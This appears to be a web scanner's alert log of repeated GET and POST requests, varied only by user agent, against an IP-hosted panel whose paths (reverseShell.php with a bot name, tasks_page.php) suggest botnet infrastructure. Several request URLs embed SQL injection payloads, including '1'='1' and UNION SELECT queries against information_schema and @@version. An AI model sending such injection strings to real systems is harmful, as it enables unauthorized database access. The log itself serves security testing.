Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
